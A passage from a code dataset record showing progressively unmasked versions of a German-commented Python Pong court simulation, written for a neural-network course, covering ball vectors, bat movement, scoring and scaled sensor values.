:return void\n \"\"\"\n self.Points[player] += 1\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n <mask token>\n <mask token>\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom 
Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player)) / self.y_max\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n 
return self.Points[player]\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n self.posVec += self.dirVec * self.speed\n self._bathit = [False, False]\n self._out = [False, False]\n if self.bouncecount > 10:\n self.__initvectors()\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n self.__tickBounceLeft()\n self.__tickBounceRight()\n <mask token>\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n if self.posVec[0] > self.x_max:\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[1] = poi[1]\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1\n ] + self.batsize:\n self._bathit[1] = True\n else:\n self.Points[0] += 1\n self._out[1] = True\n if self.infinite or self._bathit[1]:\n self.posVec[0] = 2 * self.x_max - self.posVec[0]\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n else:\n self.__initvectors()\n self.bouncecount = 0\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param 
player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n if type(action) == str:\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n elif type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n\n def v_getBatSize(self):\n \"\"\"\n visu-getter\n\n :return float Schlägerlänge (Größe)\n \"\"\"\n return self.batsize\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass court:\n <mask token>\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n self.x_max = 16.0\n self.y_max = 9.0\n self.speed = 0.5\n self.outputNoiseMax = 0.0\n self.infinite = False\n self.batsize = 1.0\n self.batstep = 0.3\n self.posVec = None\n self.dirVec = None\n self._bathit = [False, False]\n self._out = [False, False]\n self.Points = [0, 0]\n self.poi = [None, None]\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n self.bouncecount = 0\n self.__initvectors()\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle\n )], [np.sin(rotationAngle), np.cos(rotationAngle)]])\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0\n self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]\n )\n self.bouncecount = 0\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return void\n \"\"\"\n self.Points[player] += 1\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n <mask token>\n\n def __sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, 
Schlägerposition von Spieler[Player]\n \"\"\"\n return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player)) / self.y_max\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie 
von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n return self.Points[player]\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n self.posVec += self.dirVec * self.speed\n self._bathit = [False, False]\n self._out = [False, False]\n if self.bouncecount > 10:\n self.__initvectors()\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n self.__tickBounceLeft()\n self.__tickBounceRight()\n <mask token>\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n if self.posVec[0] > self.x_max:\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[1] = poi[1]\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1\n ] + self.batsize:\n self._bathit[1] = True\n else:\n self.Points[0] += 1\n self._out[1] = True\n if self.infinite or self._bathit[1]:\n self.posVec[0] = 2 * self.x_max - self.posVec[0]\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n 
else:\n self.__initvectors()\n self.bouncecount = 0\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n if type(action) == str:\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n elif type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n\n def v_getBatSize(self):\n \"\"\"\n visu-getter\n\n :return float Schlägerlänge (Größe)\n \"\"\"\n return self.batsize\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n\n def v_getPoint(self):\n \"\"\"\n 
visu-getter\n\n :return: Liste [X,Y] des Punktestundes für Spieler 0 / 1\n \"\"\"\n return self.Points\n",
"step-4": "<mask token>\n\n\nclass court:\n \"\"\"\n Objekt, dass das Spielfeld darstellt.\n\n Enthält außerdem Funktionen zur Manipulation von Schlägern und Inspektoren für die Daten:\n - Skalierte Daten für die KNNs\n - Unskalierte Daten für die Visualisierung\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n self.x_max = 16.0\n self.y_max = 9.0\n self.speed = 0.5\n self.outputNoiseMax = 0.0\n self.infinite = False\n self.batsize = 1.0\n self.batstep = 0.3\n self.posVec = None\n self.dirVec = None\n self._bathit = [False, False]\n self._out = [False, False]\n self.Points = [0, 0]\n self.poi = [None, None]\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n self.bouncecount = 0\n self.__initvectors()\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle\n )], [np.sin(rotationAngle), np.cos(rotationAngle)]])\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0\n self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]\n )\n self.bouncecount = 0\n\n def _incrpoints(self, player):\n \"\"\"\n Erhöht den Punktestand für einen Spieler[Player]\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return void\n \"\"\"\n self.Points[player] += 1\n\n def __sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, X-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax\n\n def 
__sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles mit Rauschen zurück\n\n :return float, Y-Anteil vom Ortsvektor\n \"\"\"\n return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax\n\n def __sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, Schlägerposition von Spieler[Player]\n \"\"\"\n return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax\n\n def scaled_sensor_x(self):\n \"\"\"\n Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_x())\n\n :return float, skalierter X-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_x() / (self.x_max / 2.0) - 1.0\n\n def scaled_sensor_y(self):\n \"\"\"\n Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück\n (Rauschen kommt von __sensor_y())\n\n :return float, skalierter Y-Anteil vom Ortsvektor\n \"\"\"\n return self.__sensor_y() / (self.y_max / 2.0) - 1.0\n\n def scaled_sensor_bat(self, player):\n \"\"\"\n Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1\n mit Rauschen zurück\n (Rauschen kommt von __sensor_bat())\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierte Schlägerposition von Spieler[Player]\n \"\"\"\n return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0\n\n def hitbat(self, player):\n \"\"\"\n Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]\n \"\"\"\n return self._bathit[player]\n\n def scaled_sensor_err(self, player):\n \"\"\"\n Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.\n\n :pre hitbat(player) 
or out(player)\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return float, skalierter Error von Spieler[Player]\n \"\"\"\n return (self.poi[player] - self.__sensor_bat(player)) / self.y_max\n\n def out(self, player):\n \"\"\"\n Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.\n\n :param player: Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)\n \"\"\"\n return self._out[player]\n\n def getpoints(self, player):\n \"\"\"\n Liefert die Punktanzahl von Spieler[Player]\n\n :param player: Punktzahl von Spieler 0 oder 1\n :type player: Int (0 oder 1)\n\n :return int, Punktzahl des Spielers\n \"\"\"\n return self.Points[player]\n\n def tick(self):\n \"\"\"\n Berechnet einen Tick/Spielzug,\n hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien\n oder die Kollision mit einem Schläger auf False initialisiert, außerdem\n die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und\n her gespielt haben ohne Tor (Endlosspiel verhindern).\n Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen\n Bewegungs-/Richtungsvektor ändern muss.\n Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder\n ob ein Schläger den Ball getroffen hat.\n\n :return void\n \"\"\"\n self.posVec += self.dirVec * self.speed\n self._bathit = [False, False]\n self._out = [False, False]\n if self.bouncecount > 10:\n self.__initvectors()\n if self.posVec[1] < 0:\n self.posVec[1] *= -1.0\n self.dirVec[1] *= -1.0\n if self.posVec[1] > self.y_max:\n self.posVec[1] = 2 * self.y_max - self.posVec[1]\n self.dirVec[1] *= -1.0\n self.__tickBounceLeft()\n self.__tickBounceRight()\n\n def __tickBounceLeft(self):\n \"\"\"\n Checken, ob der Ball links bei Spieler 0 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n\n :return: void\n \"\"\"\n if self.posVec[0] < 0:\n factor = 
(0 - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[0] = poi[1]\n if poi[1] > self.bat[0] - self.batsize and poi[1] < self.bat[0\n ] + self.batsize:\n self._bathit[0] = True\n else:\n self.Points[1] += 1\n self._out[0] = True\n if self.infinite or self._bathit[0]:\n self.posVec[0] *= -1.0\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n else:\n self.__initvectors()\n self.bouncecount = 0\n\n def __tickBounceRight(self):\n \"\"\"Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird\n :return: void\n \"\"\"\n if self.posVec[0] > self.x_max:\n factor = (self.x_max - self.posVec[0]) / self.dirVec[0]\n poi = self.posVec + factor * self.dirVec\n self.poi[1] = poi[1]\n if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1\n ] + self.batsize:\n self._bathit[1] = True\n else:\n self.Points[0] += 1\n self._out[1] = True\n if self.infinite or self._bathit[1]:\n self.posVec[0] = 2 * self.x_max - self.posVec[0]\n self.dirVec[0] *= -1.0\n self.bouncecount += 1\n else:\n self.__initvectors()\n self.bouncecount = 0\n\n def move(self, player, action):\n \"\"\"\n Bewegt den Schläger eines Spielers\n Diese Funktion ist etwas Trickreich, da als \"action\"-Parameter sowohl ein String als direkter\n up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.\n\n :param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)\n :type player: Int\n\n :param action: Wenn str, dann zwischen \"d\" oder \"u\" unterscheiden (Schläger hoch oder runter bewegen)\n :type action: String\n\n :param action: Wenn float, dann Schläger auf die entsprechende Position setzen\n :type action: float\n\n :return: void\n \"\"\"\n if type(action) == str:\n if action == 'u':\n self.bat[player] += self.batstep\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n if action == 'd':\n self.bat[player] -= self.batstep\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n elif 
type(action) == float:\n self.bat[player] = (action + 1) * self.y_max / 2\n if self.bat[player] < 0.0:\n self.bat[player] = 0.0\n if self.bat[player] > self.y_max:\n self.bat[player] = self.y_max\n\n def v_getSize(self):\n \"\"\"\n visu-getter\n\n :return float Liste [Float: X, Float: Y] der Spielfeldgröße\n \"\"\"\n return [self.x_max, self.y_max]\n\n def v_getSpeed(self):\n \"\"\"\n visu-getter\n\n :return float Ballgeschwindigkeit\n \"\"\"\n return self.speed\n\n def v_getBatSize(self):\n \"\"\"\n visu-getter\n\n :return float Schlägerlänge (Größe)\n \"\"\"\n return self.batsize\n\n def v_getDirVec(self):\n \"\"\"\n visu-getter\n\n :return float Bewegungsvektor\n \"\"\"\n return self.dirVec\n\n def v_getPosVec(self):\n \"\"\"\n visu-getter\n\n :return float Ortsvektor Liste [Float: X,Float: Y]\n \"\"\"\n return self.posVec\n\n def v_getbat(self):\n \"\"\"\n visu-getter\n\n :return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1\n \"\"\"\n return self.bat\n\n def v_getPoint(self):\n \"\"\"\n visu-getter\n\n :return: Liste [X,Y] des Punktestundes für Spieler 0 / 1\n \"\"\"\n return self.Points\n",
"step-5": "#!/usr/bin/env python3.4\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDas Pong-Spielfeld wird simuliert.\n\nCourt moduliert ein anpassbares Spielfeld für Pong mit einem standardmäßigen Seitenverhältnis von 16:9.\nJenes Spielfeld verfügt über einen Ball und zwei Schläger, jeweils links und rechts am Spielfeldrand,\nsowie einen Punktestand für beide Spieler (0 und 1).\nSpieler 0 spielt auf der linken Hälfte, Spieler 1 auf der rechten Hälfte.\nZwecks einfacher Adaptierung an Folgesysteme ist die Schnittstelle mit normierten Ein- und Ausgabewerten versehen,\nwelches alle Daten auf ein Interval [-1.0, 1.0] normiert.\n\"\"\"\n\n__author__ = \"Daniel Speck, Florian Kock\"\n__copyright__ = \"Copyright 2014, Praktikum Neuronale Netze\"\n__license__ = \"GPLv3\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Daniel Speck, Florian Kock\"\n__email__ = \"2speck@informatik.uni-hamburg.de, 2kock@informatik.uni-hamburg.de\"\n__status__ = \"Development\"\n\nimport numpy as np\nimport random\n\n\nclass court:\n \"\"\"\n Objekt, dass das Spielfeld darstellt.\n\n Enthält außerdem Funktionen zur Manipulation von Schlägern und Inspektoren für die Daten:\n - Skalierte Daten für die KNNs\n - Unskalierte Daten für die Visualisierung\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n Initialisiert ein court-Objekt.\n Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.\n\n :return void\n \"\"\"\n\n ##############################\n ### veränderbare Parameter ###\n ##############################\n\n # Größe des Spielfeldes (standardmäßig 16 zu 9; hat bei Tests bewährt)\n self.x_max = 16.0\n self.y_max = 9.0\n\n # Ballgeschwindigkeit\n # (Faktor für den Richtungs-/Bewegungsvektor / die Ballgeschwindigkeit;\n # NeuerOrtsvektor = AlterOrtsvektor + Richtungs-/Bewegungsvektor * Ballgeschwindigkeitsfaktor)\n self.speed = 0.5\n\n # Rauschen auf die Ballposition hinzufügen (Faktor)\n self.outputNoiseMax = 0.0 # Achtung: Noch nie mit Rauschen getestet! 
Sollte bei 0 bleiben!\n\n # Soll der Ball aus dem Spielfeld fliegen können oder ewig hin und her springen?\n # True -> Ball fliegt ewig hin und her, wird bei einem Tor nicht auf Startposition zurückgesetzt\n # False -> Ball wird bei Tor zurückgesetzt auf die Startposition\n self.infinite = False\n\n # Größe der Schläger von Spieler 0 und 1\n # (von der Mitte zum Ende, d.h hier die halbe Länge der gewünschten Gesamtlänge eintragen!)\n self.batsize = 1.0\n\n # Im Befehlsmodus kann der Schläger mit den Befehlen 'u' und 'd' bewegt werden.\n # Hier wird die dazugehörige Sprungweite des Schlägers angegeben.\n self.batstep = 0.3\n\n ############################################\n ### Initialisierungen (nicht verändern!) ###\n ############################################\n\n # Ortsvektor des Balles (Bezugspunkt ist [0,0])\n self.posVec = None\n\n # Richtungs-/Bewegungsvektor des Balles (Einheitsvektor)\n self.dirVec = None\n\n # Binärer Speicher, ob der Ball den einen Schläger getroffen hat [links, rechts]\n self._bathit = [False, False]\n\n # Binärer Speicher, ob der Ball die Linie geflogen ist [links, rechts]\n self._out = [False, False]\n\n # Punktestand [Spieler 0, Spieler 1]\n self.Points = [0, 0]\n\n # Der \"Einschlagspunkt\" des Balles auf der (Toraus-)Linie, wird erst nach einem Aufprall\n # mit konkreten Werten belegt und dann zur Fehlerberechnung genutzt (supervised learning).\n self.poi = [None, None]\n\n # Initiale Schlägerpositionen der Spieler auf ihren Linien.\n # [SchlängerLinks, SchlägerRechts]\n # Positionsänderungen sind somit, wie in Pong üblich, nur auf der Y-Achse möglich.\n self.bat = [self.y_max / 2.0, self.y_max / 2.0]\n\n # Zählt die Schlägertreffer (Kollisionen des Balles mit einem Schläger).\n # Die KNNs sollen unterschiedliche Winkel lernen (der Winkel wird immer zufallsinitialisiert),\n # bei ausreichender Lerndauer bzw. 
stark minimiertem Fehler jedoch sind die KNNs manchmal auf\n # einigen Winkeln derart talentiert, dass der Ball nie mehr über die Torlinie gehen würde.\n # Um ein solches \"Endlosspiel\" zu verhindern, wird der Ball nach 10 Treffern resettet,\n # das Spielfeld also zurückgesetzt mit einer initialen Ballposition auf der Spielfeldmitte und\n # neuem, zufallskalkuliertem Winkel.\n self.bouncecount = 0\n\n # Startvorbereitung\n # Initialisiert das erste Mal den Ortsvektor und Bewegungs-/Richtungsvektor\n self.__initvectors()\n\n\n def __initvectors(self):\n \"\"\"\n Initialisiert Anfangs- und Richtungsballvektoren.\n Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.\n Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.\n\n :return void\n \"\"\"\n\n # Richtungsvektor erzeugen\n\n # Zufallswinkel im Bogenmaß generieren\n # 2 Pi entsprechen dem vollen Einheitskreis, also 360°\n # [-Pi/4, +Pi/4] entspricht einem Interval von [-45°, +45°]\n # Dieses Interval hat sich bewährt, da zu spitze den Lerneffekt und vor allem die Lerndauer\n # negativ beeinflussen.\n rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)\n\n # Aus dem Zufallswinkel eine entsprechende Rotationsmatrix generieren\n rotMatrix = np.array([\n [np.cos(rotationAngle), -np.sin(rotationAngle)],\n [np.sin(rotationAngle), np.cos(rotationAngle)]\n ])\n\n # Rotationsmatrix auf einen Einheitsvektor (horizontale Ausrichtung) anwenden\n self.dirVec = np.dot(rotMatrix, np.array([1, 0]))\n\n # Zufällig entscheiden, ob der Ball nach links (zu Player 0) oder rechts (zu Player 1) startet.\n if random.random() > 0.5:\n self.dirVec[0] *= -1.0 # x-Komponente des Richtungs-/Bewegungsvektors wird an der Y-Achse gespiegelt\n\n # Ortsvektor erzeugen\n\n # Start irgendowo auf der Mittellinie\n # (x-Koordinate ist also fixiert auf die Mittellinie, y-Koordinate zufällig)\n self.posVec = np.array([self.x_max / 2.0, self.y_max * 
